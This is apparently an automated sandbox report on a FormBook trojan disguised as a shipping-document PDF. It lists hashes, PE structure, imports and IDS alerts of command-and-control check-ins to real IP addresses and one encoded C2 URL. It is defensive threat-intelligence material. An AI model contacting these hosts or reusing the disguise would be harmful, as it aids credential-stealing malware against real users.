            z4Shipping_document_pdf.exe | 32% | ReversingLabs | Win32.Trojan.Autoitinject |
            z4Shipping_document_pdf.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
                                                                                                        unknown
                                                                                                        http://www.longfilsalphonse.net/iq05/?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4whtrue
                                                                                                          unknown
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522882
Start date and time: 2024-09-30 19:55:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z4Shipping_document_pdf.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/14
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 22
• Number of non-executed functions: 324
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target fWXPcgRbOhi.exe, PID 4068 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• VT rate limit hit for: z4Shipping_document_pdf.exe
Time | Type | Description
13:57:21 | API Interceptor | 9767692x Sleep call for process: rasdial.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\SysWOW64\rasdial.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):196608
                                                                                                                    Entropy (8bit):1.121297215059106
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Process:C:\Users\user\Desktop\z4Shipping_document_pdf.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):287232
                                                                                                                    Entropy (8bit):7.994479275098664
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:JcqN8syYqTN2yhHxV9mjsbqPmv5S+eBQBirCsX/pb98X+:Jc08syYqIkHxbmjmquhSJQBHMiO
                                                                                                                    MD5:D173AD5DDE0DCE1ED77A9399ECE26FF6
                                                                                                                    SHA1:954D91F5F843D7E5662147061B574E8BA4E8F2BB
                                                                                                                    SHA-256:8D94F2181424A9B8298644FCE3E55B29F083725CF3224221E00F311FF8768CF0
                                                                                                                    SHA-512:ADDE46809AFA932923E4B4CF9B0441FE79F551BC9C76CCD5ED5BFEB5BADB1C1B1AB775C555D6A95B865D8592E99600FF0A2D5ABE77A592230386533E99A14123
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.551556359056507
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                    • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:z4Shipping_document_pdf.exe
                                                                                                                    File size:1'400'925 bytes
                                                                                                                    MD5:aeb5e672510e739f463553e45d7f7283
                                                                                                                    SHA1:07ec11b8ab945f5560dae2f458a63a91a3653ad3
                                                                                                                    SHA256:1a685b6a7199bf38e27672e7d65a403b8809fd83fb272e47cb26054a74d2dbe9
                                                                                                                    SHA512:0295d945c385346058ee3d60366cbe70d40c3049acb7302515e356b1630f7ca7304b7a3e8670d947b04d1b668a768aba7f507c2f1e29c804bc989b32acd0b3dc
                                                                                                                    SSDEEP:24576:ffmMv6Ckr7Mny5QLPXOyQVFGLqHY7tygENso45Eh7TDR7btD:f3v+7/5QLPFQVMq47qNz5TFdD
                                                                                                                    TLSH:D655F112B7D680B2EDA339B1293BE317EB3475194323C58B97E42E779F211409B367A1
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                                                    Icon Hash:1733312925935517
                                                                                                                    Entrypoint:0x416310
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                                                    Instruction
                                                                                                                    call 00007FEAC093AAFCh
                                                                                                                    jmp 00007FEAC092E8CEh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push edi
                                                                                                                    push esi
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581

DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll | DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T19:56:59.678961+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49712 | 54.67.87.110 | 80 | TCP
2024-09-30T19:57:15.567301+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49713 | 195.161.68.8 | 80 | TCP
2024-09-30T19:57:18.204526+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49714 | 195.161.68.8 | 80 | TCP
2024-09-30T19:57:20.890904+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49715 | 195.161.68.8 | 80 | TCP
2024-09-30T19:57:23.296669+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49716 | 195.161.68.8 | 80 | TCP
2024-09-30T19:57:30.046246+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49717 | 18.141.10.107 | 80 | TCP
2024-09-30T19:57:32.812279+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49718 | 18.141.10.107 | 80 | TCP
2024-09-30T19:57:35.668161+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49719 | 18.141.10.107 | 80 | TCP
2024-09-30T19:57:38.033225+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49720 | 18.141.10.107 | 80 | TCP
2024-09-30T19:57:38.042145+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49720 | TCP
2024-09-30T19:57:44.965155+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49721 | 197.189.237.186 | 80 | TCP
2024-09-30T19:57:47.511999+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49722 | 197.189.237.186 | 80 | TCP
2024-09-30T19:57:50.059160+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49723 | 197.189.237.186 | 80 | TCP
2024-09-30T19:57:52.647870+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49724 | 197.189.237.186 | 80 | TCP
2024-09-30T19:58:01.229295+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49725 | 203.175.9.128 | 80 | TCP
2024-09-30T19:58:03.824658+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49726 | 203.175.9.128 | 80 | TCP
2024-09-30T19:58:06.299872+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49727 | 203.175.9.128 | 80 | TCP
2024-09-30T19:58:08.840099+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49728 | 203.175.9.128 | 80 | TCP
2024-09-30T19:58:14.598245+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49729 | 162.0.238.246 | 80 | TCP
2024-09-30T19:58:17.157457+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49730 | 162.0.238.246 | 80 | TCP
2024-09-30T19:58:19.707879+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49731 | 162.0.238.246 | 80 | TCP
2024-09-30T19:58:22.257209+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49732 | 162.0.238.246 | 80 | TCP
2024-09-30T19:58:28.107637+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49733 | 31.31.196.17 | 80 | TCP
2024-09-30T19:58:30.695961+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49734 | 31.31.196.17 | 80 | TCP
                                                                                                                    2024-09-30T19:58:33.215000+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973531.31.196.1780TCP
                                                                                                                    2024-09-30T19:58:35.790023+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54973631.31.196.1780TCP
                                                                                                                    2024-09-30T19:58:41.825941+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973752.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:44.220847+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973852.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:46.816695+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54973952.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:49.264413+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54974052.223.13.4180TCP
                                                                                                                    2024-09-30T19:58:54.789242+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549741188.114.96.380TCP
                                                                                                                    2024-09-30T19:58:57.350011+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549742188.114.96.380TCP
                                                                                                                    2024-09-30T19:58:59.906012+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549743188.114.96.380TCP
                                                                                                                    2024-09-30T19:59:02.420341+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549744188.114.96.380TCP
                                                                                                                    2024-09-30T19:59:08.371769+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549745206.119.82.14780TCP
